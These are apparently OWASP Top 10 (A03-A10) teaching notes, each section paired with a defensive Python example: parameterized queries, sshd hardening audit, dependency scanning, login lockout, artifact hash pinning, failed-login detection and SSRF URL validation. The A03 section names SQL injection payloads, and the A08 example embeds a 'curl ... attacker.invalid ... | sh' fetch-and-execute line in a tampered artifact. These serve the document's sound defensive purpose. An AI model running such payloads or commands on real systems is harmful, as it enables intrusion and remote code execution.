A03 - Injection

This document discusses various application security risks and ways to prevent them. It covers topics like injection vulnerabilities, insecure design, security misconfiguration, outdated components, authentication and authorization issues, integrity failures, logging and monitoring problems, and server-side request forgery. The key recommendations are to validate all inputs, use prepared statements, implement secure development practices, keep software updated, log appropriately, and authenticate and authorize users properly.

A03 - Injection

•User input is not validated, filtered or sanitized by the application.
•User input is used directly in, or concatenated into, a query or command that an interpreter executes, so characters in the input become part of the statement's syntax.
- SQL injection
- Command injection
A03 – How to prevent

•Do not pass user input directly to executable statements (SQL, shell commands, LDAP, OS APIs).
•Use prepared statements
- Parameterized queries: the statement text is fixed and the values are bound separately, so input is never parsed as SQL.
•Keep the database server patched and up to date.
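Added example (not from the slides): the same login check written with string concatenation and with a bound parameter, and a shell command built both ways, to show why the two A03 slides above insist on keeping input out of the statement text. The table rows, the `' OR '1'='1` and `alice'--` payloads, and the hostname allowlist are all constructed; `echo` stands in for a real tool such as `ping` so the command part runs anywhere.

```python
"""Added example (not from the slides): one login query written with string
concatenation and with a bound parameter, plus a shell command built the
same two ways. Database rows and payloads are constructed inline."""
import re
import sqlite3
import subprocess


def make_db() -> sqlite3.Connection:
    # In-memory SQLite with one constructed account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Input is concatenated into the statement text, so a quote in the input
    # ends the string literal and the rest of the input is parsed as SQL.
    sql = (
        "SELECT 1 FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The statement text is fixed; the values are bound separately and the
    # database never parses them as SQL.
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def run_echo_vulnerable(host: str) -> str:
    # shell=True hands the concatenated string to /bin/sh, so ';', '|' or
    # '$(...)' in the input start new commands.
    return subprocess.run("echo " + host, shell=True,
                          capture_output=True, text=True).stdout


def run_echo_argv(host: str) -> str:
    # List form, no shell: the whole string stays one argument to echo and
    # shell metacharacters are inert.
    return subprocess.run(["echo", host], capture_output=True, text=True).stdout


# Constructed allowlist for a hostname argument (letters, digits, dots, dashes).
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


def run_echo_safe(host: str) -> str:
    # Validate against the allowlist first, then use the list form.
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname")
    return run_echo_argv(host)
```

The vulnerable query is bypassed both by a tautology in the password field and by a comment marker in the username field; the parameterized version returns false for both because the payload is compared as a literal string. The list form of `subprocess.run` removes the shell, and the allowlist rejects the input before it reaches any tool.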
A04 – Insecure Design

•A secure design can still have an insecure implementation.
•An insecure design cannot be fixed by a perfect implementation: the security controls it needs were never designed in.
A04 – How to implement

•Secure Development Lifecycle (SDL)
•Threat modeling (see the Threat Modeling Manifesto).
A05 – Security Misconfiguration

•Missing security hardening
•Unnecessary features are enabled or installed
- Unnecessary open ports
- Services
- Accounts
•Default accounts
•Default passwords
A05 – How to prevent

•Apply security hardening
•Close unnecessary ports
•Disable unnecessary services
•Remove default accounts
•Change default passwords
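Added example (not from the slides): a hardening check over an OpenSSH `sshd_config` excerpt, as one concrete form of the "apply security hardening" bullet above. The two config excerpts and the baseline of expected values are constructed for illustration and are not an official benchmark. The parser keeps the first occurrence of each keyword because that is what sshd does, which is why a "fix" appended at the bottom of a file changes nothing.

```python
"""Added example (not from the slides): a hardening check over an sshd_config
excerpt. The config texts and the baseline below are constructed for
illustration, not an official benchmark."""
import re

# Directive -> value a hardened configuration is expected to carry.
BASELINE = {
    "PermitRootLogin": "no",
    "PasswordAuthentication": "no",
    "PermitEmptyPasswords": "no",
    "X11Forwarding": "no",
}

# "Keyword value" or "Keyword=value"; keywords are case-insensitive in sshd.
_DIRECTIVE_RE = re.compile(r"^(\w+)\s*(?:=|\s)\s*(.+?)\s*$")


def parse_sshd_config(text: str) -> dict:
    """Return {keyword_lowercase: value}, keeping the FIRST occurrence of each
    keyword as sshd does. Parsing stops at the first Match block, whose
    directives are conditional and out of scope for this check."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.lower().startswith("match "):
            break
        m = _DIRECTIVE_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        directives.setdefault(key, value)
    return directives


def audit_sshd_config(text: str) -> list:
    """List deviations from BASELINE; an empty list means the excerpt passes."""
    directives = parse_sshd_config(text)
    findings = []
    for key, expected in BASELINE.items():
        actual = directives.get(key.lower())
        if actual is None:
            findings.append(f"{key} not set; relies on the compiled-in default, set it to '{expected}'")
        elif actual.lower() != expected:
            findings.append(f"{key} is '{actual}', expected '{expected}'")
    return findings


# Constructed excerpts. The weak one ends with a 'PermitRootLogin no' that
# sshd ignores because an earlier line already set the keyword.
WEAK_CONFIG = """\
# constructed sshd_config excerpt with default-style settings
Port 22
PermitRootLogin yes
PasswordAuthentication yes
X11Forwarding yes
PermitRootLogin no
"""

HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication=no
PermitEmptyPasswords no
X11Forwarding no
"""
```

Run `audit_sshd_config` over the real file on a host (or in CI against the file in configuration management) and fail the build on any finding; the same first-occurrence rule is why a drop-in under `sshd_config.d/` included at the top of the file wins over settings further down.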
A06 – Vulnerable or Outdated components

•Software in use is vulnerable, unsupported or outdated; this includes libraries and frameworks pulled in as dependencies, not only the application itself.
- Example: the Apache Log4j (Log4Shell) vulnerability, where a widely used logging library made every application that bundled it exploitable.
A06 – How to prevent

•Update software and its dependencies regularly, on a schedule and in response to advisories.
•Use software composition analysis (SCA) tools to inventory components and match their versions against known vulnerabilities.
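Added example (not from the slides): the matching step an SCA tool performs, comparing a dependency inventory against advisories carrying affected version ranges. The inventory lines and the `com.example:widgets` entry are constructed; the single advisory mirrors CVE-2021-44228 (Log4Shell) with a simplified range that ignores pre-release tags and the separate Java 7 backport release line, so it is illustrative rather than authoritative.

```python
"""Added example (not from the slides): the matching step of an SCA tool.
The inventory is constructed; the advisory mirrors CVE-2021-44228 with a
simplified version range."""


def parse_version(text: str) -> tuple:
    # Numeric dotted versions only ("2.14.1" -> (2, 14, 1)); a real tool
    # needs a full Maven/semver comparator with pre-release handling.
    return tuple(int(part) for part in text.split("."))


# (coordinate, introduced inclusive, fixed exclusive, advisory id)
ADVISORIES = [
    ("org.apache.logging.log4j:log4j-core", "2.0", "2.15.0",
     "CVE-2021-44228 (Log4Shell)"),
]


def parse_inventory(text: str) -> list:
    """Lines of '<group:artifact> <version>'; '#' starts a comment."""
    deps = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            coordinate, version = line.split()
            deps.append((coordinate, version))
    return deps


def scan(inventory_text: str) -> list:
    """Return (coordinate, version, advisory_id) for every affected dependency."""
    findings = []
    for coordinate, version in parse_inventory(inventory_text):
        v = parse_version(version)
        for coord, introduced, fixed, advisory in ADVISORIES:
            if coord == coordinate and parse_version(introduced) <= v < parse_version(fixed):
                findings.append((coordinate, version, advisory))
    return findings


# Constructed inventories, in the shape of `mvn dependency:list` output.
INVENTORY_BEFORE = """\
org.apache.logging.log4j:log4j-core 2.14.1   # transitive, via a logging starter
org.apache.logging.log4j:log4j-api 2.14.1
com.example:widgets 1.4.0
"""

INVENTORY_AFTER = """\
org.apache.logging.log4j:log4j-core 2.17.1
org.apache.logging.log4j:log4j-api 2.17.1
com.example:widgets 1.4.0
"""
```

The point of the transitive comment is that the vulnerable artifact is often not declared anywhere in the application's own build file; the inventory has to come from the resolved dependency tree, and a real advisory feed (OSV, GitHub Advisory Database, vendor feeds) replaces the constructed list.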
A07 – Identification and Authentication failures

•Missing brute-force protection
•Missing multi-factor authentication
•Using default, weak or well-known passwords
•Reusing the pre-login session identifier after successful login (session fixation)
A07 – How to prevent

•Implement brute-force protection (rate limiting, lockout or delay after repeated failures)
•Implement multi-factor authentication
•Change default credentials
•Enforce password strength (length and complexity; a check against known breached passwords is stronger than complexity rules alone)
•Rotate session IDs after successful login
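Added example (not from the slides): a small login service that implements three of the controls listed above in one place: lockout after repeated failures, salted PBKDF2 password hashing with a constant-time compare, and rotation of the session ID at login so a fixated pre-login ID never becomes authenticated. The account, the thresholds and the injectable clock are constructed for illustration; the iteration count is kept low so the example runs quickly and should be raised in production.

```python
"""Added example (not from the slides): lockout after repeated failures,
PBKDF2 password hashing and session ID rotation at login. Accounts,
thresholds and the clock are constructed for illustration."""
import hashlib
import hmac
import os
import secrets

MAX_FAILURES = 5             # failed attempts before lockout
LOCKOUT_SECONDS = 900        # lockout duration
PBKDF2_ITERATIONS = 100_000  # low for the example; use a current, higher value in production
_DUMMY_SALT = os.urandom(16)
_DUMMY_DIGEST = hashlib.pbkdf2_hmac("sha256", b"dummy", _DUMMY_SALT, PBKDF2_ITERATIONS)


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


class AuthService:
    def __init__(self, clock):
        self.clock = clock       # returns seconds; injectable so tests can advance time
        self.users = {}          # username -> (salt, digest)
        self.failures = {}       # username -> (count, locked_until)
        self.sessions = {}       # session_id -> username, or None before login

    def register(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self.users[username] = (salt, _hash(password, salt))

    def new_session(self) -> str:
        # Anonymous session issued before authentication (e.g. for the login form).
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = None
        return sid

    def login(self, session_id: str, username: str, password: str):
        now = self.clock()
        count, locked_until = self.failures.get(username, (0, 0))
        if now < locked_until:
            return None, "locked"
        # Hash even for unknown users so response time does not reveal which names exist.
        salt, digest = self.users.get(username, (_DUMMY_SALT, _DUMMY_DIGEST))
        ok = username in self.users and hmac.compare_digest(_hash(password, salt), digest)
        if not ok:
            count += 1
            locked_until = now + LOCKOUT_SECONDS if count >= MAX_FAILURES else 0
            self.failures[username] = (count, locked_until)
            return None, "invalid"          # same answer for bad name and bad password
        self.failures.pop(username, None)
        # Rotate: discard the pre-login ID so an ID planted by an attacker
        # (session fixation) never turns into an authenticated session.
        self.sessions.pop(session_id, None)
        new_id = secrets.token_urlsafe(32)
        self.sessions[new_id] = username
        return new_id, "ok"
```

Lockout is keyed by username here; a real service also rate-limits per source IP and per credential pair so one attacker cannot lock out legitimate users at will, and it records every outcome to the audit log (see A09).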
A08 – Software and Data Integrity failures

•Software and data integrity failures occur when code and infrastructure do not protect against integrity violations, for example software updates, dependencies or CI/CD pipelines that accept code and data without verifying where they came from or whether they were altered.
- SolarWinds 2020 supply-chain attack, where a compromised build pipeline shipped malicious code inside signed vendor updates.
A08 – How to prevent

•Use digital signatures (or pinned hashes) to verify that software and updates come from the expected source and were not altered in transit.
•Ensure you consume libraries and dependencies only from trusted repositories.
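Added example (not from the slides): recording a digest for a build artifact at release time and verifying a later download against it before the artifact is used, the same idea as pip's `--require-hashes` or a checked-in lockfile. The artifact bytes, the tampered copy and the `widgets==1.4.0` name are constructed. A signature scheme (Sigstore, GPG) is the stronger control named on the slide; this shows the integrity check itself with only the standard library.

```python
"""Added example (not from the slides): pin a digest at release time, verify
a download against it before use. The artifact bytes are constructed."""
import hashlib
import hmac

ACCEPTED_ALGORITHMS = {"sha256", "sha512"}   # md5/sha1 pins are rejected


def record_pin(name: str, data: bytes, algo: str = "sha256") -> str:
    """Produce a lockfile line such as 'widgets==1.4.0 --hash=sha256:<hex>'.
    Run once at build/release time and commit the line to the consuming repo."""
    if algo not in ACCEPTED_ALGORITHMS:
        raise ValueError(f"refusing weak hash algorithm {algo}")
    return f"{name} --hash={algo}:{hashlib.new(algo, data).hexdigest()}"


def parse_pin(line: str) -> tuple:
    name, sep, rest = line.partition(" --hash=")
    if not sep:
        raise ValueError("pin line has no --hash")
    algo, _, hexdigest = rest.partition(":")
    if algo not in ACCEPTED_ALGORITHMS:
        raise ValueError(f"refusing weak hash algorithm {algo}")
    return name, algo, hexdigest.lower()


def verify_artifact(pin_line: str, data: bytes) -> bool:
    """True only if the downloaded bytes match the pinned digest. On False the
    caller must not unpack, install or execute the artifact."""
    _, algo, expected = parse_pin(pin_line)
    actual = hashlib.new(algo, data).hexdigest()
    # Constant-time compare; the digest is not secret, but this avoids
    # making a habit of '==' on security-relevant strings.
    return hmac.compare_digest(actual, expected)


# Constructed artifact and a tampered copy, as a compromised mirror or build
# server might serve it. The hostname uses the reserved .invalid TLD.
GOOD_ARTIFACT = b"#!/bin/sh\necho 'widgets 1.4.0 installer'\n"
TAMPERED_ARTIFACT = GOOD_ARTIFACT + b"curl -s http://attacker.invalid/x | sh\n"
```

The pin must come from a source independent of the download channel (a lockfile in version control, a vendor-published signed checksum), otherwise a mirror that can swap the artifact can swap the digest too.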
A09 – Security Logging and Monitoring Failures

•Insufficient logging of
- Logins
- Failed logins
- High-value transactions
•Logs are only stored locally, so an attacker who compromises the host can erase them and nobody else sees them.
A09 - how to prevent

•Log important events with sufficient user context
- Username
- Client IP
- Time
•Forward logs to a central system rather than keeping them only on the host, and monitor them for patterns such as repeated failures.
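Added example (not from the slides): authentication events written as one JSON object per line carrying the username, client IP and time the slide asks for, and a detector run over such lines that flags a source IP with many failed logins inside a short window. The log lines, the usernames and the RFC 5737 test addresses are constructed; the threshold and window are assumptions.

```python
"""Added example (not from the slides): JSON-lines auth events with user
context, and a failed-login burst detector over them. Log content is
constructed from RFC 5737 test addresses."""
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone


def log_event(event: str, username: str, client_ip: str, when: datetime) -> str:
    # One record per line keeps the log greppable and parseable by a central
    # collector. Never put the password or the session ID in the record.
    record = {
        "ts": when.astimezone(timezone.utc).isoformat(),
        "event": event,
        "user": username,
        "src_ip": client_ip,
    }
    return json.dumps(record, sort_keys=True)


def detect_failed_login_bursts(lines, threshold: int = 5,
                               window: timedelta = timedelta(seconds=60)) -> set:
    """Return the source IPs with >= threshold 'login_failed' events inside any
    window-sized span. Lines must be in time order (as a collector emits them)."""
    recent = defaultdict(deque)   # src_ip -> timestamps of recent failures
    flagged = set()
    for line in lines:
        rec = json.loads(line)
        if rec.get("event") != "login_failed":
            continue
        ts = datetime.fromisoformat(rec["ts"])
        q = recent[rec["src_ip"]]
        q.append(ts)
        while q and ts - q[0] > window:      # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            flagged.add(rec["src_ip"])
    return flagged


def sample_log() -> list:
    """Constructed log: a password spray from 203.0.113.7 across six usernames,
    interleaved with normal activity from 198.51.100.5, in time order."""
    t0 = datetime(2024, 5, 1, 12, 0, 0, tzinfo=timezone.utc)
    lines = [log_event("login_success", "alice", "198.51.100.5", t0)]
    for i in range(6):
        lines.append(log_event("login_failed", f"user{i}", "203.0.113.7",
                               t0 + timedelta(seconds=5 * i + 1)))
    lines.append(log_event("login_failed", "alice", "198.51.100.5",
                           t0 + timedelta(seconds=40)))
    lines.append(log_event("high_value_transfer", "alice", "198.51.100.5",
                           t0 + timedelta(seconds=55)))
    return lines
```

Because each record carries the source IP and a timestamp, the detector can distinguish one user mistyping a password from one address cycling through many usernames; without the IP field (the "user context" the slide asks for) the spray is invisible.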
A10 – Server Side Request Forgery (SSRF)

•A web application fetches a remote resource without validating the user-supplied URL, so an attacker can make the server send requests to destinations of their choosing, including internal services that are not reachable from outside.
A10 – How to prevent

•Sanitize and validate all client-supplied input data
•Validate URL components
- URL scheme, port and destination (reject loopback, private and link-local addresses after resolving the hostname)
•Do not send raw responses to the client
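Added example (not from the slides): an SSRF guard implementing the three checks on the slide above: allowlisted scheme, allowlisted port, and a destination check that resolves the hostname and rejects any address that is loopback, private, link-local or otherwise non-public (the cloud metadata address 169.254.169.254 included). The resolver is injectable so the example runs offline; `resolve_all` is the production resolver, and the lookup table used in the test is constructed.

```python
"""Added example (not from the slides): validate scheme, port and destination
of a user-supplied URL before the server fetches it. The resolver is
injectable so the check can run offline against a constructed table."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_all(host: str) -> set:
    # Production resolver: every A/AAAA answer, not just the first, because an
    # attacker-controlled name can mix public and internal records.
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(text: str) -> bool:
    ip = ipaddress.ip_address(text)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped        # ::ffff:127.0.0.1 is still loopback
    return ip.is_global and not (ip.is_multicast or ip.is_reserved)


def validate_outbound_url(url: str, resolver=resolve_all) -> tuple:
    """Return (scheme, host, port, sorted resolved addresses) or raise ValueError."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {port}")
    try:
        addresses = {str(ipaddress.ip_address(host))}     # IP literal in the URL
    except ValueError:
        addresses = set(resolver(host))                   # hostname: resolve it
    if not addresses:
        raise ValueError(f"unresolvable host: {host}")
    for addr in addresses:
        if not is_public_address(addr):
            raise ValueError(f"destination {addr} is not a public address")
    return scheme, host, port, sorted(addresses)
```

Two caveats a practitioner needs alongside this check: connect to the address that was validated rather than letting the HTTP client resolve the name again (otherwise DNS rebinding swaps in an internal address between check and use), and re-run the check on every redirect hop. For the last bullet on the slide, pass the client only the fields it needs from the upstream response (status, content type, a bounded and parsed body), never the raw bytes and headers.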
